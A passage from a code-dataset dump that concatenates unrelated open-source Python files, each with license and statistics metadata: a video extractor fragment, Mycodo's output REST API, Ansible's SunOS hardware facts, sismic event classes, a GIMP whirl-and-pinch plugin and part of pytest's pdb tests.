'movie_(?P<videoID>[0-9]+)':\s*\{\s*
FILENAME:\s*"(?P<videoURL>[\w:/\.\?=]+)"
(,\s*MOVIE_NAME:\s*\"(?P<videoName>[\w:/\.\?=\+-]+)\")?\s*\},
''', webpage)
titles = re.finditer(
r'<span class="title">(?P<videoName>.+?)</span>', webpage)
thumbs = re.finditer(
r'<img class="movie_thumb" src="(?P<thumbnail>.+?)">', webpage)
videos = []
for vid, vtitle, thumb in zip(mweb, titles, thumbs):
video_id = vid.group('videoID')
title = vtitle.group('videoName')
video_url = vid.group('videoURL')
video_thumb = thumb.group('thumbnail')
if not video_url:
raise ExtractorError('Cannot find video url for %s' % video_id)
videos.append({
'id': video_id,
'url': video_url,
'ext': 'flv',
'title': unescapeHTML(title),
'thumbnail': video_thumb
})
if not videos:
raise ExtractorError('Could not find any videos')
return self.playlist_result(videos, playlist_id, playlist_title)
| unlicense | -7,882,243,147,157,133,000 | 36.902439 | 148 | 0.478979 | false |
kizniche/Mycodo | mycodo/mycodo_flask/api/output.py | 1 | 9541 | # coding=utf-8
import logging
import traceback
import flask_login
from flask_accept import accept
from flask_restx import Resource
from flask_restx import abort
from flask_restx import fields
from mycodo.databases.models import Output
from mycodo.databases.models import OutputChannel
from mycodo.databases.models.output import OutputChannelSchema
from mycodo.databases.models.output import OutputSchema
from mycodo.mycodo_client import DaemonControl
from mycodo.mycodo_flask.api import api
from mycodo.mycodo_flask.api import default_responses
from mycodo.mycodo_flask.api.sql_schema_fields import output_channel_fields
from mycodo.mycodo_flask.api.sql_schema_fields import output_fields
from mycodo.mycodo_flask.api.utils import get_from_db
from mycodo.mycodo_flask.api.utils import return_list_of_dictionaries
from mycodo.mycodo_flask.utils import utils_general
from mycodo.mycodo_flask.utils.utils_output import get_all_output_states
logger = logging.getLogger(__name__)
ns_output = api.namespace('outputs', description='Output operations')
MODEL_STATES_STATE = ns_output.model('states', {
'*': fields.Wildcard(fields.String(description='on, off, or a duty cycle'),)
})
MODEL_STATES_CHAN = ns_output.model('channels', {
'*': fields.Wildcard(fields.Nested(
MODEL_STATES_STATE,
description='Dictionary with channel as key and state data as value.'))
})
output_list_fields = ns_output.model('Output Fields List', {
'output devices': fields.List(fields.Nested(output_fields)),
'output channels': fields.List(fields.Nested(output_channel_fields)),
'output states': fields.Nested(
MODEL_STATES_CHAN,
description='Dictionary with ID as key and channel state data as value.')
})
output_unique_id_fields = ns_output.model('Output Device Fields List', {
'output device': fields.Nested(output_fields),
'output device channels': fields.List(fields.Nested(output_channel_fields)),
'output device channel states': fields.Nested(
MODEL_STATES_STATE,
description='Dictionary with channel as key and state data as value.')
})
output_set_fields = ns_output.model('Output Modulation Fields', {
'state': fields.Boolean(
description='Set a non-PWM output state to on (True) or off (False).',
required=False),
'channel': fields.Float(
description='The output channel to modulate.',
required=True,
example=0,
min=0),
'duration': fields.Float(
description='The duration to keep a non-PWM output on, in seconds.',
required=False,
example=10.0,
exclusiveMin=0),
'duty_cycle': fields.Float(
description='The duty cycle to set a PWM output, in percent (%).',
required=False,
example=50.0,
min=0),
'volume': fields.Float(
description='The volume to send to an output.',
required=False,
example=35.0,
min=0)
})
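# An illustrative request body against the model above, turning channel 0 on for ten
# seconds: {"state": true, "channel": 0, "duration": 10.0}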
def return_handler(return_):
if return_ is None:
return {'message': 'Success'}, 200
elif return_[0] in [0, 'success']:
return {'message': 'Success: {}'.format(return_[1])}, 200
elif return_[0] in [1, 'error']:
return {'message': 'Fail: {}'.format(return_[1])}, 460
else:
return '', 500
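# For example, a daemon reply of (0, 'output on') maps to
# ({'message': 'Success: output on'}, 200), and (1, 'no output') maps to a 460 response.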
@ns_output.route('/')
@ns_output.doc(security='apikey', responses=default_responses)
class Inputs(Resource):
"""Output information"""
@accept('application/vnd.mycodo.v1+json')
@ns_output.marshal_with(output_list_fields)
@flask_login.login_required
def get(self):
"""Show all output settings and statuses"""
if not utils_general.user_has_permission('view_settings'):
abort(403)
try:
list_data = get_from_db(OutputSchema, Output)
list_channels = get_from_db(OutputChannelSchema, OutputChannel)
states = get_all_output_states()
# Change integer channel keys to strings (flask-restx limitation?)
new_state_dict = {}
for each_id in states:
new_state_dict[each_id] = {}
for each_channel in states[each_id]:
new_state_dict[each_id][str(each_channel)] = states[each_id][each_channel]
if list_data:
return {'output devices': list_data,
'output channels': list_channels,
'output states': new_state_dict}, 200
except Exception:
abort(500,
message='An exception occurred',
error=traceback.format_exc())
@ns_output.route('/<string:unique_id>')
@ns_output.doc(
security='apikey',
responses=default_responses,
params={'unique_id': 'The unique ID of the output.'}
)
class Outputs(Resource):
"""Output status"""
@accept('application/vnd.mycodo.v1+json')
@ns_output.marshal_with(output_unique_id_fields)
@flask_login.login_required
def get(self, unique_id):
"""Show the settings and status for an output"""
if not utils_general.user_has_permission('edit_controllers'):
abort(403)
try:
list_data = get_from_db(OutputSchema, Output, unique_id=unique_id)
output_channel_schema = OutputChannelSchema()
list_channels = return_list_of_dictionaries(
output_channel_schema.dump(
OutputChannel.query.filter_by(
output_id=unique_id).all(), many=True))
states = get_all_output_states()
# Change integer channel keys to strings (flask-restx limitation?)
new_state_dict = {}
for each_channel in states[unique_id]:
new_state_dict[str(each_channel)] = states[unique_id][each_channel]
return {'output device': list_data,
'output device channels': list_channels,
'output device channel states': new_state_dict}, 200
except Exception:
abort(500,
message='An exception occurred',
error=traceback.format_exc())
@accept('application/vnd.mycodo.v1+json')
@ns_output.expect(output_set_fields)
@flask_login.login_required
def post(self, unique_id):
"""Change the state of an output"""
if not utils_general.user_has_permission('edit_controllers'):
abort(403)
control = DaemonControl()
state = None
channel = None
duration = None
duty_cycle = None
volume = None
if ns_output.payload:
if 'state' in ns_output.payload:
state = ns_output.payload["state"]
if state is not None:
try:
state = bool(state)
except Exception:
abort(422, message='state must represent a bool value')
if 'channel' in ns_output.payload:
channel = ns_output.payload["channel"]
if channel is not None:
try:
channel = int(channel)
except Exception:
abort(422, message='channel does not represent a number')
else:
channel = 0
if 'duration' in ns_output.payload:
duration = ns_output.payload["duration"]
if duration is not None:
try:
duration = float(duration)
except Exception:
abort(422, message='duration does not represent a number')
else:
duration = 0
if 'duty_cycle' in ns_output.payload:
duty_cycle = ns_output.payload["duty_cycle"]
if duty_cycle is not None:
try:
duty_cycle = float(duty_cycle)
if duty_cycle < 0 or duty_cycle > 100:
abort(422, message='Required: 0 <= duty_cycle <= 100')
except Exception:
abort(422, message='duty_cycle does not represent float value')
if 'volume' in ns_output.payload:
volume = ns_output.payload["volume"]
if volume is not None:
try:
volume = float(volume)
except Exception:
abort(422, message='volume does not represent float value')
try:
if state is not None and duration is not None:
return_ = control.output_on_off(
unique_id, state, output_channel=channel,
output_type='sec', amount=duration)
elif duty_cycle is not None:
return_ = control.output_on(
unique_id, output_channel=channel, output_type='pwm', amount=duty_cycle)
elif volume is not None:
return_ = control.output_on(
                    unique_id, output_channel=channel, output_type='vol', amount=volume)
elif state is not None:
return_ = control.output_on_off(
unique_id, state, output_channel=channel)
else:
return {'message': 'Insufficient payload'}, 460
return return_handler(return_)
except Exception:
abort(500,
message='An exception occurred',
error=traceback.format_exc())
| gpl-3.0 | 8,491,038,470,360,638,000 | 37.164 | 94 | 0.585159 | false |
DepthDeluxe/ansible | lib/ansible/module_utils/facts/hardware/sunos.py | 64 | 9586 | # This file is part of Ansible
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <http://www.gnu.org/licenses/>.
from __future__ import (absolute_import, division, print_function)
__metaclass__ = type
import re
from ansible.module_utils.six.moves import reduce
from ansible.module_utils.basic import bytes_to_human
from ansible.module_utils.facts.utils import get_file_content, get_mount_size
from ansible.module_utils.facts.hardware.base import Hardware, HardwareCollector
from ansible.module_utils.facts import timeout
class SunOSHardware(Hardware):
"""
In addition to the generic memory and cpu facts, this also sets
swap_reserved_mb and swap_allocated_mb that is available from *swap -s*.
"""
platform = 'SunOS'
def populate(self, collected_facts=None):
hardware_facts = {}
# FIXME: could pass to run_command(environ_update), but it also tweaks the env
# of the parent process instead of altering an env provided to Popen()
# Use C locale for hardware collection helpers to avoid locale specific number formatting (#24542)
self.module.run_command_environ_update = {'LANG': 'C', 'LC_ALL': 'C', 'LC_NUMERIC': 'C'}
cpu_facts = self.get_cpu_facts()
memory_facts = self.get_memory_facts()
dmi_facts = self.get_dmi_facts()
device_facts = self.get_device_facts()
uptime_facts = self.get_uptime_facts()
mount_facts = {}
try:
mount_facts = self.get_mount_facts()
except timeout.TimeoutError:
pass
hardware_facts.update(cpu_facts)
hardware_facts.update(memory_facts)
hardware_facts.update(dmi_facts)
hardware_facts.update(device_facts)
hardware_facts.update(uptime_facts)
hardware_facts.update(mount_facts)
return hardware_facts
def get_cpu_facts(self, collected_facts=None):
physid = 0
sockets = {}
cpu_facts = {}
collected_facts = collected_facts or {}
rc, out, err = self.module.run_command("/usr/bin/kstat cpu_info")
cpu_facts['processor'] = []
for line in out.splitlines():
if len(line) < 1:
continue
data = line.split(None, 1)
key = data[0].strip()
# "brand" works on Solaris 10 & 11. "implementation" for Solaris 9.
if key == 'module:':
brand = ''
elif key == 'brand':
brand = data[1].strip()
elif key == 'clock_MHz':
clock_mhz = data[1].strip()
elif key == 'implementation':
processor = brand or data[1].strip()
# Add clock speed to description for SPARC CPU
# FIXME
if collected_facts.get('ansible_machine') != 'i86pc':
processor += " @ " + clock_mhz + "MHz"
if 'ansible_processor' not in collected_facts:
cpu_facts['processor'] = []
cpu_facts['processor'].append(processor)
elif key == 'chip_id':
physid = data[1].strip()
if physid not in sockets:
sockets[physid] = 1
else:
sockets[physid] += 1
# Counting cores on Solaris can be complicated.
# https://blogs.oracle.com/mandalika/entry/solaris_show_me_the_cpu
# Treat 'processor_count' as physical sockets and 'processor_cores' as
        # virtual CPUs visible to Solaris. Not a true count of cores for modern SPARC as
# these processors have: sockets -> cores -> threads/virtual CPU.
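        # For example (illustrative): chip_id 0 reported for 8 virtual CPUs and chip_id 1
        # for another 8 gives processor_count=2 and processor_cores=16.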
if len(sockets) > 0:
cpu_facts['processor_count'] = len(sockets)
cpu_facts['processor_cores'] = reduce(lambda x, y: x + y, sockets.values())
else:
cpu_facts['processor_cores'] = 'NA'
cpu_facts['processor_count'] = len(cpu_facts['processor'])
return cpu_facts
def get_memory_facts(self):
memory_facts = {}
rc, out, err = self.module.run_command(["/usr/sbin/prtconf"])
for line in out.splitlines():
if 'Memory size' in line:
memory_facts['memtotal_mb'] = int(line.split()[2])
rc, out, err = self.module.run_command("/usr/sbin/swap -s")
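        # "swap -s" prints one summary line, e.g. (illustrative):
        #   total: 123456k bytes allocated + 23456k reserved = 146912k used, 1048576k available
        # The fixed word offsets below pick out the allocated, reserved, used and available figures.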
allocated = int(out.split()[1][:-1])
reserved = int(out.split()[5][:-1])
used = int(out.split()[8][:-1])
free = int(out.split()[10][:-1])
memory_facts['swapfree_mb'] = free // 1024
memory_facts['swaptotal_mb'] = (free + used) // 1024
memory_facts['swap_allocated_mb'] = allocated // 1024
memory_facts['swap_reserved_mb'] = reserved // 1024
return memory_facts
@timeout.timeout()
def get_mount_facts(self):
mount_facts = {}
mount_facts['mounts'] = []
# For a detailed format description see mnttab(4)
# special mount_point fstype options time
fstab = get_file_content('/etc/mnttab')
if fstab:
for line in fstab.splitlines():
fields = line.split('\t')
mount_statvfs_info = get_mount_size(fields[1])
mount_info = {'mount': fields[1],
'device': fields[0],
'fstype': fields[2],
'options': fields[3],
'time': fields[4]}
mount_info.update(mount_statvfs_info)
mount_facts['mounts'].append(mount_info)
return mount_facts
def get_dmi_facts(self):
dmi_facts = {}
uname_path = self.module.get_bin_path("prtdiag")
rc, out, err = self.module.run_command(uname_path)
"""
rc returns 1
"""
if out:
system_conf = out.split('\n')[0]
found = re.search(r'(\w+\sEnterprise\s\w+)', system_conf)
if found:
dmi_facts['product_name'] = found.group(1)
return dmi_facts
def get_device_facts(self):
        # Device facts are derived from sderr kstats. This code does not use the
# full output, but rather queries for specific stats.
# Example output:
# sderr:0:sd0,err:Hard Errors 0
# sderr:0:sd0,err:Illegal Request 6
# sderr:0:sd0,err:Media Error 0
# sderr:0:sd0,err:Predictive Failure Analysis 0
# sderr:0:sd0,err:Product VBOX HARDDISK 9
# sderr:0:sd0,err:Revision 1.0
# sderr:0:sd0,err:Serial No VB0ad2ec4d-074a
# sderr:0:sd0,err:Size 53687091200
# sderr:0:sd0,err:Soft Errors 0
# sderr:0:sd0,err:Transport Errors 0
# sderr:0:sd0,err:Vendor ATA
        device_facts = {}
        device_facts['devices'] = {}
disk_stats = {
'Product': 'product',
'Revision': 'revision',
'Serial No': 'serial',
'Size': 'size',
'Vendor': 'vendor',
'Hard Errors': 'hard_errors',
'Soft Errors': 'soft_errors',
'Transport Errors': 'transport_errors',
'Media Error': 'media_errors',
'Predictive Failure Analysis': 'predictive_failure_analysis',
'Illegal Request': 'illegal_request',
}
cmd = ['/usr/bin/kstat', '-p']
for ds in disk_stats:
cmd.append('sderr:::%s' % ds)
d = {}
rc, out, err = self.module.run_command(cmd)
if rc != 0:
return device_facts
sd_instances = frozenset(line.split(':')[1] for line in out.split('\n') if line.startswith('sderr'))
for instance in sd_instances:
lines = (line for line in out.split('\n') if ':' in line and line.split(':')[1] == instance)
for line in lines:
text, value = line.split('\t')
stat = text.split(':')[3]
if stat == 'Size':
d[disk_stats.get(stat)] = bytes_to_human(float(value))
else:
d[disk_stats.get(stat)] = value.rstrip()
diskname = 'sd' + instance
device_facts['devices'][diskname] = d
d = {}
return device_facts
def get_uptime_facts(self):
uptime_facts = {}
# On Solaris, unix:0:system_misc:snaptime is created shortly after machine boots up
        # and displays time in seconds. This is much easier than using uptime as we would
# need to have a parsing procedure for translating from human-readable to machine-readable
# format.
# Example output:
# unix:0:system_misc:snaptime 1175.410463590
rc, out, err = self.module.run_command('/usr/bin/kstat -p unix:0:system_misc:snaptime')
if rc != 0:
return
uptime_facts['uptime_seconds'] = int(float(out.split('\t')[1]))
return uptime_facts
class SunOSHardwareCollector(HardwareCollector):
_fact_class = SunOSHardware
_platform = 'SunOS'
| gpl-3.0 | 8,220,107,935,792,656,000 | 35.173585 | 108 | 0.566555 | false |
AlexandreDecan/sismic | sismic/model/events.py | 1 | 2623 | import warnings
from typing import Any
__all__ = ['Event', 'InternalEvent', 'MetaEvent']
class Event:
"""
An event with a name and (optionally) some data passed as named parameters.
The list of parameters can be obtained using *dir(event)*. Notice that
*name* and *data* are reserved names. If a *delay* parameter is provided,
    then this event is considered a delayed event (and won't be
    executed until the given delay has elapsed).
When two events are compared, they are considered equal if their names
and their data are equal.
:param name: name of the event.
:param data: additional data passed as named parameters.
"""
__slots__ = ['name', 'data']
def __init__(self, name: str, **additional_parameters: Any) -> None:
self.name = name
self.data = additional_parameters
def __eq__(self, other):
if isinstance(other, Event):
return (self.name == other.name and self.data == other.data)
else:
return NotImplemented
def __getattr__(self, attr):
try:
return self.data[attr]
except KeyError:
raise AttributeError('{} has no attribute {}'.format(self, attr))
def __getstate__(self):
# For pickle and implicitly for multiprocessing
return self.name, self.data
def __setstate__(self, state):
# For pickle and implicitly for multiprocessing
self.name, self.data = state
def __hash__(self):
return hash(self.name)
def __dir__(self):
return ['name'] + list(self.data.keys())
def __repr__(self):
if self.data:
return '{}({!r}, {})'.format(
self.__class__.__name__, self.name, ', '.join(
'{}={!r}'.format(k, v) for k, v in self.data.items()))
else:
return '{}({!r})'.format(self.__class__.__name__, self.name)
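# A small illustrative use: e = Event('button_pressed', x=3) exposes e.name and e.x (== 3),
# and repr(e) == "Event('button_pressed', x=3)".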
class InternalEvent(Event):
"""
Subclass of Event that represents an internal event.
"""
pass
class DelayedEvent(Event):
"""
An event that is delayed.
Deprecated since 1.4.0, use `Event` with a `delay` parameter instead.
"""
def __init__(self, name: str, delay: float, **additional_parameters: Any) -> None:
warnings.warn(
'DelayedEvent is deprecated since 1.4.0, use Event with a delay parameter instead.',
DeprecationWarning)
super().__init__(name, delay=delay, **additional_parameters)
class MetaEvent(Event):
"""
Subclass of Event that represents a MetaEvent, as used in property statecharts.
"""
pass
| lgpl-3.0 | -4,263,694,073,331,279,000 | 28.47191 | 96 | 0.599695 | false |
Bootz/shiny-robot | plug-ins/pygimp/plug-ins/whirlpinch.py | 16 | 9500 | #!/usr/bin/env python
# Gimp-Python - allows the writing of Gimp plugins in Python.
# Copyright (C) 1997 James Henstridge <[email protected]>
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
# Algorithms stolen from the whirl and pinch plugin distributed with Gimp,
# by Federico Mena Quintero and Scott Goehring
#
# This version does the same thing, except there is no preview, and it is
# written in python and is slower.
import math, struct
from gimpfu import *
class pixel_fetcher:
def __init__(self, drawable):
self.col = -1
self.row = -1
self.img_width = drawable.width
self.img_height = drawable.height
self.img_bpp = drawable.bpp
self.img_has_alpha = drawable.has_alpha
self.tile_width = gimp.tile_width()
self.tile_height = gimp.tile_height()
self.bg_colour = '\0\0\0\0'
self.bounds = drawable.mask_bounds
self.drawable = drawable
self.tile = None
def set_bg_colour(self, r, g, b, a):
self.bg_colour = struct.pack('BBB', r,g,b)
if self.img_has_alpha:
self.bg_colour = self.bg_colour + chr(a)
def get_pixel(self, x, y):
sel_x1, sel_y1, sel_x2, sel_y2 = self.bounds
if x < sel_x1 or x >= sel_x2 or y < sel_y1 or y >= sel_y2:
return self.bg_colour
col = x / self.tile_width
coloff = x % self.tile_width
row = y / self.tile_height
rowoff = y % self.tile_height
if col != self.col or row != self.row or self.tile == None:
self.tile = self.drawable.get_tile(False, row, col)
self.col = col
self.row = row
return self.tile[coloff, rowoff]
class Dummy:
pass
def whirl_pinch(image, drawable, whirl, pinch, radius):
self = Dummy()
self.width = drawable.width
self.height = drawable.height
self.bpp = drawable.bpp
self.has_alpha = drawable.has_alpha
self.bounds = drawable.mask_bounds
self.sel_x1, self.sel_y1, self.sel_x2, self.sel_y2 = \
drawable.mask_bounds
self.sel_w = self.sel_x2 - self.sel_x1
self.sel_h = self.sel_y2 - self.sel_y1
self.cen_x = (self.sel_x1 + self.sel_x2 - 1) / 2.0
self.cen_y = (self.sel_y1 + self.sel_y2 - 1) / 2.0
xhsiz = (self.sel_w - 1) / 2.0
yhsiz = (self.sel_h - 1) / 2.0
if xhsiz < yhsiz:
self.scale_x = yhsiz / xhsiz
self.scale_y = 1.0
elif xhsiz > yhsiz:
self.scale_x = 1.0
self.scale_y = xhsiz / yhsiz
else:
self.scale_x = 1.0
self.scale_y = 1.0
    self.radius = max(xhsiz, yhsiz)
if not drawable.is_rgb and not drawable.is_grey:
return
gimp.tile_cache_ntiles(2 * (1 + self.width / gimp.tile_width()))
whirl = whirl * math.pi / 180
dest_rgn = drawable.get_pixel_rgn(self.sel_x1, self.sel_y1,
self.sel_w, self.sel_h, True, True)
pft = pixel_fetcher(drawable)
pfb = pixel_fetcher(drawable)
bg_colour = gimp.get_background()
pft.set_bg_colour(bg_colour[0], bg_colour[1], bg_colour[2], 0)
pfb.set_bg_colour(bg_colour[0], bg_colour[1], bg_colour[2], 0)
progress = 0
max_progress = self.sel_w * self.sel_h
gimp.progress_init("Whirling and pinching")
self.radius2 = self.radius * self.radius * radius
pixel = ['', '', '', '']
values = [0,0,0,0]
for row in range(self.sel_y1, (self.sel_y1+self.sel_y2)/2+1):
top_p = ''
bot_p = ''
for col in range(self.sel_x1, self.sel_x2):
q, cx, cy = calc_undistorted_coords(self, col,
row, whirl, pinch,
radius)
if q:
if cx >= 0: ix = int(cx)
else: ix = -(int(-cx) + 1)
if cy >= 0: iy = int(cy)
                else: iy = -(int(-cy) + 1)
pixel[0] = pft.get_pixel(ix, iy)
pixel[1] = pft.get_pixel(ix+1, iy)
pixel[2] = pft.get_pixel(ix, iy+1)
pixel[3] = pft.get_pixel(ix+1, iy+1)
for i in range(self.bpp):
values[0] = ord(pixel[0][i])
values[1] = ord(pixel[1][i])
values[2] = ord(pixel[2][i])
values[3] = ord(pixel[3][i])
top_p = top_p + bilinear(cx,cy, values)
cx = self.cen_x + (self.cen_x - cx)
cy = self.cen_y + (self.cen_y - cy)
if cx >= 0: ix = int(cx)
else: ix = -(int(-cx) + 1)
if cy >= 0: iy = int(cy)
else: iy = -(int(-cy) + 1)
pixel[0] = pfb.get_pixel(ix, iy)
pixel[1] = pfb.get_pixel(ix+1, iy)
pixel[2] = pfb.get_pixel(ix, iy+1)
pixel[3] = pfb.get_pixel(ix+1, iy+1)
tmp = ''
for i in range(self.bpp):
values[0] = ord(pixel[0][i])
values[1] = ord(pixel[1][i])
values[2] = ord(pixel[2][i])
values[3] = ord(pixel[3][i])
tmp = tmp + bilinear(cx,cy, values)
bot_p = tmp + bot_p
else:
top_p = top_p + pft.get_pixel(col, row)
bot_p = pfb.get_pixel((self.sel_x2 - 1) -
(col - self.sel_x1), (self.sel_y2-1) -
(row - self.sel_y1)) + bot_p
dest_rgn[self.sel_x1:self.sel_x2, row] = top_p
dest_rgn[self.sel_x1:self.sel_x2, (self.sel_y2 - 1)
- (row - self.sel_y1)] = bot_p
progress = progress + self.sel_w * 2
gimp.progress_update(float(progress) / max_progress)
drawable.flush()
drawable.merge_shadow(True)
drawable.update(self.sel_x1,self.sel_y1,self.sel_w,self.sel_h)
def calc_undistorted_coords(self, wx, wy, whirl, pinch, radius):
dx = (wx - self.cen_x) * self.scale_x
dy = (wy - self.cen_y) * self.scale_y
d = dx * dx + dy * dy
inside = d < self.radius2
if inside:
dist = math.sqrt(d / radius) / self.radius
if (d == 0.0):
factor = 1.0
else:
factor = math.pow(math.sin(math.pi / 2 * dist),
-pinch)
dx = dx * factor
dy = dy * factor
factor = 1 - dist
ang = whirl * factor * factor
sina = math.sin(ang)
cosa = math.cos(ang)
x = (cosa * dx - sina * dy) / self.scale_x + self.cen_x
y = (sina * dx + cosa * dy) / self.scale_y + self.cen_y
else:
x = wx
y = wy
return inside, float(x), float(y)
def bilinear(x, y, values):
x = x % 1.0
y = y % 1.0
m0 = values[0] + x * (values[1] - values[0])
m1 = values[2] + x * (values[3] - values[2])
return chr(int(m0 + y * (m1 - m0)))
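# bilinear() mixes the four neighbouring pixel values by the fractional parts of x and y;
# e.g. bilinear(0.5, 0.0, [0, 255, 0, 255]) == chr(127) (illustrative).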
register(
"python-fu-whirl-pinch",
"Distorts an image by whirling and pinching",
"Distorts an image by whirling and pinching",
"James Henstridge (translated from C plugin)",
"James Henstridge",
"1997-1999",
"_Whirl and Pinch...",
"RGB*, GRAY*",
[
(PF_IMAGE, "image", "Input image", None),
(PF_DRAWABLE, "drawable", "Input drawable", None),
(PF_SLIDER, "whirl", "Whirl angle", 90, (-360, 360, 1)),
(PF_FLOAT, "pinch", "Pinch amount", 0),
(PF_FLOAT, "radius", "radius", 1)
],
[],
whirl_pinch, menu="<Image>/Filters/Distorts")
main()
| gpl-3.0 | 4,800,084,004,397,519,000 | 40.85022 | 79 | 0.451895 | false |
tgoodlet/pytest | testing/test_pdb.py | 5 | 11401 | import sys
import platform
import _pytest._code
import pytest
def runpdb_and_get_report(testdir, source):
p = testdir.makepyfile(source)
result = testdir.runpytest_inprocess("--pdb", p)
reports = result.reprec.getreports("pytest_runtest_logreport")
assert len(reports) == 3, reports # setup/call/teardown
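    # index 1 is the call-phase report; the assertions in the tests below inspect it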
return reports[1]
class TestPDB:
@pytest.fixture
def pdblist(self, request):
monkeypatch = request.getfixturevalue("monkeypatch")
pdblist = []
def mypdb(*args):
pdblist.append(args)
plugin = request.config.pluginmanager.getplugin('debugging')
monkeypatch.setattr(plugin, 'post_mortem', mypdb)
return pdblist
def test_pdb_on_fail(self, testdir, pdblist):
rep = runpdb_and_get_report(testdir, """
def test_func():
assert 0
""")
assert rep.failed
assert len(pdblist) == 1
tb = _pytest._code.Traceback(pdblist[0][0])
assert tb[-1].name == "test_func"
def test_pdb_on_xfail(self, testdir, pdblist):
rep = runpdb_and_get_report(testdir, """
import pytest
@pytest.mark.xfail
def test_func():
assert 0
""")
assert "xfail" in rep.keywords
assert not pdblist
def test_pdb_on_skip(self, testdir, pdblist):
rep = runpdb_and_get_report(testdir, """
import pytest
def test_func():
pytest.skip("hello")
""")
assert rep.skipped
assert len(pdblist) == 0
def test_pdb_on_BdbQuit(self, testdir, pdblist):
rep = runpdb_and_get_report(testdir, """
import bdb
def test_func():
raise bdb.BdbQuit
""")
assert rep.failed
assert len(pdblist) == 0
def test_pdb_interaction(self, testdir):
p1 = testdir.makepyfile("""
def test_1():
i = 0
assert i == 1
""")
child = testdir.spawn_pytest("--pdb %s" % p1)
child.expect(".*def test_1")
child.expect(".*i = 0")
child.expect("(Pdb)")
child.sendeof()
rest = child.read().decode("utf8")
assert "1 failed" in rest
assert "def test_1" not in rest
self.flush(child)
@staticmethod
def flush(child):
if platform.system() == 'Darwin':
return
if child.isalive():
child.wait()
def test_pdb_unittest_postmortem(self, testdir):
p1 = testdir.makepyfile("""
import unittest
class Blub(unittest.TestCase):
def tearDown(self):
self.filename = None
def test_false(self):
self.filename = 'debug' + '.me'
assert 0
""")
child = testdir.spawn_pytest("--pdb %s" % p1)
child.expect('(Pdb)')
child.sendline('p self.filename')
child.sendeof()
rest = child.read().decode("utf8")
assert 'debug.me' in rest
self.flush(child)
def test_pdb_unittest_skip(self, testdir):
"""Test for issue #2137"""
p1 = testdir.makepyfile("""
import unittest
@unittest.skipIf(True, 'Skipping also with pdb active')
class MyTestCase(unittest.TestCase):
def test_one(self):
assert 0
""")
child = testdir.spawn_pytest("-rs --pdb %s" % p1)
child.expect('Skipping also with pdb active')
child.expect('1 skipped in')
child.sendeof()
self.flush(child)
def test_pdb_interaction_capture(self, testdir):
p1 = testdir.makepyfile("""
def test_1():
print("getrekt")
assert False
""")
child = testdir.spawn_pytest("--pdb %s" % p1)
child.expect("getrekt")
child.expect("(Pdb)")
child.sendeof()
rest = child.read().decode("utf8")
assert "1 failed" in rest
assert "getrekt" not in rest
self.flush(child)
def test_pdb_interaction_exception(self, testdir):
p1 = testdir.makepyfile("""
import pytest
def globalfunc():
pass
def test_1():
pytest.raises(ValueError, globalfunc)
""")
child = testdir.spawn_pytest("--pdb %s" % p1)
child.expect(".*def test_1")
child.expect(".*pytest.raises.*globalfunc")
child.expect("(Pdb)")
child.sendline("globalfunc")
child.expect(".*function")
child.sendeof()
child.expect("1 failed")
self.flush(child)
def test_pdb_interaction_on_collection_issue181(self, testdir):
p1 = testdir.makepyfile("""
import pytest
xxx
""")
child = testdir.spawn_pytest("--pdb %s" % p1)
#child.expect(".*import pytest.*")
child.expect("(Pdb)")
child.sendeof()
child.expect("1 error")
self.flush(child)
def test_pdb_interaction_on_internal_error(self, testdir):
testdir.makeconftest("""
def pytest_runtest_protocol():
0/0
""")
p1 = testdir.makepyfile("def test_func(): pass")
child = testdir.spawn_pytest("--pdb %s" % p1)
#child.expect(".*import pytest.*")
child.expect("(Pdb)")
child.sendeof()
self.flush(child)
def test_pdb_interaction_capturing_simple(self, testdir):
p1 = testdir.makepyfile("""
import pytest
def test_1():
i = 0
print ("hello17")
pytest.set_trace()
x = 3
""")
child = testdir.spawn_pytest(str(p1))
child.expect("test_1")
child.expect("x = 3")
child.expect("(Pdb)")
child.sendeof()
rest = child.read().decode("utf-8")
assert "1 failed" in rest
assert "def test_1" in rest
assert "hello17" in rest # out is captured
self.flush(child)
def test_pdb_set_trace_interception(self, testdir):
p1 = testdir.makepyfile("""
import pdb
def test_1():
pdb.set_trace()
""")
child = testdir.spawn_pytest(str(p1))
child.expect("test_1")
child.expect("(Pdb)")
child.sendeof()
rest = child.read().decode("utf8")
assert "1 failed" in rest
assert "reading from stdin while output" not in rest
self.flush(child)
def test_pdb_and_capsys(self, testdir):
p1 = testdir.makepyfile("""
import pytest
def test_1(capsys):
print ("hello1")
pytest.set_trace()
""")
child = testdir.spawn_pytest(str(p1))
child.expect("test_1")
child.send("capsys.readouterr()\n")
child.expect("hello1")
child.sendeof()
child.read()
self.flush(child)
def test_set_trace_capturing_afterwards(self, testdir):
p1 = testdir.makepyfile("""
import pdb
def test_1():
pdb.set_trace()
def test_2():
print ("hello")
assert 0
""")
child = testdir.spawn_pytest(str(p1))
child.expect("test_1")
child.send("c\n")
child.expect("test_2")
child.expect("Captured")
child.expect("hello")
child.sendeof()
child.read()
self.flush(child)
def test_pdb_interaction_doctest(self, testdir):
p1 = testdir.makepyfile("""
import pytest
def function_1():
'''
>>> i = 0
>>> assert i == 1
'''
""")
child = testdir.spawn_pytest("--doctest-modules --pdb %s" % p1)
child.expect("(Pdb)")
child.sendline('i')
child.expect("0")
child.expect("(Pdb)")
child.sendeof()
rest = child.read().decode("utf8")
assert "1 failed" in rest
self.flush(child)
def test_pdb_interaction_capturing_twice(self, testdir):
p1 = testdir.makepyfile("""
import pytest
def test_1():
i = 0
print ("hello17")
pytest.set_trace()
x = 3
print ("hello18")
pytest.set_trace()
x = 4
""")
child = testdir.spawn_pytest(str(p1))
child.expect("test_1")
child.expect("x = 3")
child.expect("(Pdb)")
child.sendline('c')
child.expect("x = 4")
child.sendeof()
